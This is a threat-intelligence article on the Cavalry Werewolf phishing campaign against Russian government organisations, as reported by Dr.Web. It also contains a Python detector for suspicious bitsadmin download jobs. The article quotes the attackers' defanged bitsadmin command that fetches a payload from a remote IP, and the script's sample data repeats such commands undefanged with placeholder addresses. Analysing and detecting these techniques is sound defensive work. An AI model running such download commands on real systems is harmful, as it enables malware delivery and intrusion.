Cavalry Werewolf Attacking Government Organizations to Deploy Backdoor For Network Access


In July 2025, a sophisticated hacker group known as Cavalry Werewolf executed a targeted campaign against Russian government institutions, compromising critical infrastructure through coordinated phishing operations.

The discovery of this campaign reveals a complex attack chain designed to establish persistent network access, extract sensitive data, and maintain long-term control over compromised systems.

Dr.Web security analysts identified the group after being contacted by a targeted government organization that detected suspicious email traffic originating from internal corporate accounts, suggesting unauthorized network access.

The investigation uncovered multiple previously unknown malware variants deployed across a multi-stage infection process.

The attackers demonstrated sophisticated operational security practices by leveraging open-source tools, employing encryption, and establishing command-and-control infrastructure across multiple servers.

Their arsenal includes various reverse-shell backdoors, data theft trojans, and process injection techniques that allow remote command execution without triggering traditional security mechanisms.


Dr.Web security researchers noted that this campaign represents a significant escalation in sophistication, with the group continuously expanding their toolkit to adapt to different target environments.

The attack methodology focuses on deploying backdoors that establish remote shell access, enabling attackers to execute commands and maintain persistence within compromised networks.

This approach provides the flexibility to deploy additional malware stages based on reconnaissance findings within each target organization.

Initial Access and Primary Infection Vector

Cavalry Werewolf initiates attacks through phishing emails containing weaponized attachments masquerading as official government documents.

Figure: An example of a phishing email containing BackDoor.ShellNET.1 (Source – Dr.Web)

The primary infection stage, identified as BackDoor.ShellNET.1, arrives in password-protected archives with deceptive filenames such as administrative reports and internal communications.

Once executed, this reverse-shell backdoor, based on the open-source Reverse-Shell-CS project, enables the attackers to connect remotely to infected systems and execute arbitrary commands.

Following initial compromise, the attackers leverage the legitimate Windows utility Bitsadmin to download additional malicious payloads through remote command execution.

This represents a classic living-off-the-land technique where legitimate system tools become vectors for malware deployment. The command syntax follows this pattern (URL defanged): bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe C:\users\public\downloads\winpot.exe

This particular sequence demonstrates how attackers maintain operational security by using standard Windows mechanisms that typically appear legitimate in network logs.
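The detection side of the bitsadmin pattern above is what a defender most wants to see. The following script is an added example, not code from the article or from Dr.Web; it scores process command lines (as an EDR or Sysmon Event ID 1 record would carry them) for BITS download jobs that pull from an IP-literal, cleartext source into a world-writable staging directory and land an executable there. All command lines, the job names, and the addresses (documentation-range 203.0.113.45 and 198.51.100.7, standing in for the defanged host quoted in the article) are constructed for this example; the assumption that a /transfer job is a download when no /upload switch is present follows the utility's documented default.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample process command lines (Sysmon Event ID 1 / EDR shape).
# The first line mirrors the pattern quoted in the article, with the host
# swapped for a documentation-range address so nothing here is live.
SAMPLE_COMMAND_LINES = [
    r"bitsadmin /transfer www /download http://203.0.113.45/winpot.exe C:\users\public\downloads\winpot.exe",
    r'"C:\Windows\System32\bitsadmin.exe" /transfer j1 /download /priority high http://198.51.100.7/a.dll C:\Users\Public\a.dll',
    r'bitsadmin /transfer updjob /download https://updates.corp.example/agent.msi "C:\Program Files\Corp\agent.msi"',
    r"bitsadmin /list /allusers",
    r'notepad.exe "C:\Users\alice\Documents\notes.txt"',
]

_TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
_IP_URL_RE = re.compile(r"^https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?:/|$)", re.IGNORECASE)
# Directories any local user can write to; typical second-stage drop locations.
_STAGING_PREFIXES = (r"c:\users\public", r"c:\programdata", r"c:\windows\temp")
_RISKY_EXTENSIONS = (".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta")


def tokenize(command_line: str) -> List[str]:
    """Split a Windows command line into tokens, dropping surrounding double quotes."""
    return [quoted or bare for quoted, bare in _TOKEN_RE.findall(command_line)]


@dataclass
class Finding:
    command_line: str
    job_name: str
    source: str
    destination: str
    reasons: List[str]

    @property
    def suspicious(self) -> bool:
        # Require two independent indicators so ordinary software-distribution
        # jobs (TLS, DNS name, non-executable into Program Files) stay quiet.
        return len(self.reasons) >= 2


def analyze_bitsadmin(command_line: str) -> Optional[Finding]:
    """Return a Finding for a bitsadmin HTTP download job, or None if not applicable."""
    tokens = tokenize(command_line)
    if not tokens:
        return None
    image = tokens[0].rsplit("\\", 1)[-1].lower()
    if image not in ("bitsadmin", "bitsadmin.exe"):
        return None
    lowered = [t.lower() for t in tokens]
    if "/transfer" not in lowered or "/upload" in lowered or len(tokens) < 4:
        return None  # /transfer is a download job unless /upload is given (assumed default)
    idx = lowered.index("/transfer")
    if idx + 1 >= len(tokens):
        return None
    job_name = tokens[idx + 1]
    # bitsadmin takes the remote URL and the local file name as the final pair.
    source, destination = tokens[-2], tokens[-1]
    if not re.match(r"^https?://", source, re.IGNORECASE):
        return None  # SMB/file sources are a different pattern; out of scope here
    reasons = []
    if source.lower().startswith("http://"):
        reasons.append("cleartext http source")
    if _IP_URL_RE.match(source):
        reasons.append("IP-literal host (no DNS name)")
    dest_l = destination.lower()
    if dest_l.startswith(_STAGING_PREFIXES) or "\\appdata\\local\\temp\\" in dest_l:
        reasons.append("destination is a world-writable or staging directory")
    if dest_l.endswith(_RISKY_EXTENSIONS):
        reasons.append("destination is an executable or script")
    return Finding(command_line, job_name, source, destination, reasons)


def scan(command_lines: List[str]) -> List[Finding]:
    """Return only the findings that meet the alert threshold."""
    findings = (analyze_bitsadmin(line) for line in command_lines)
    return [f for f in findings if f is not None and f.suspicious]


if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMAND_LINES):
        print(f"[ALERT] job={finding.job_name!r} src={finding.source} dst={finding.destination}")
        for reason in finding.reasons:
            print(f"         - {reason}")
```

The threshold of two indicators is a design choice: a single cleartext or IP-literal download is common enough in some estates that alerting on it alone generates noise, whereas the combination seen in this campaign (IP host, no TLS, public folder, executable payload) trips all four and is worth an immediate look. In production the same scoring would be fed from the process-creation telemetry rather than a static list, and the BITS job name (here "www") is a cheap pivot for hunting related jobs across hosts.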

The subsequent infection stages introduce file theft trojans like Trojan.FileSpyNET.5, capable of exfiltrating documents in common formats including Word files, Excel spreadsheets, PDFs, and image files.

The attackers then deploy BackDoor.Tunnel.41, based on ReverseSocks5 open-source software, which creates SOCKS5 tunnels for inconspicuous remote access and command execution.

This layered approach allows the group to maintain multiple access points within compromised infrastructure, ensuring persistence even if individual backdoors are detected and removed.

The technical sophistication displayed throughout the campaign underscores the evolving threat landscape facing government organizations.

By combining legitimate tools, open-source frameworks, and custom malware modifications, Cavalry Werewolf demonstrates a mature operational capability designed to evade detection while maintaining flexible command-and-control structures suitable for diverse target environments.
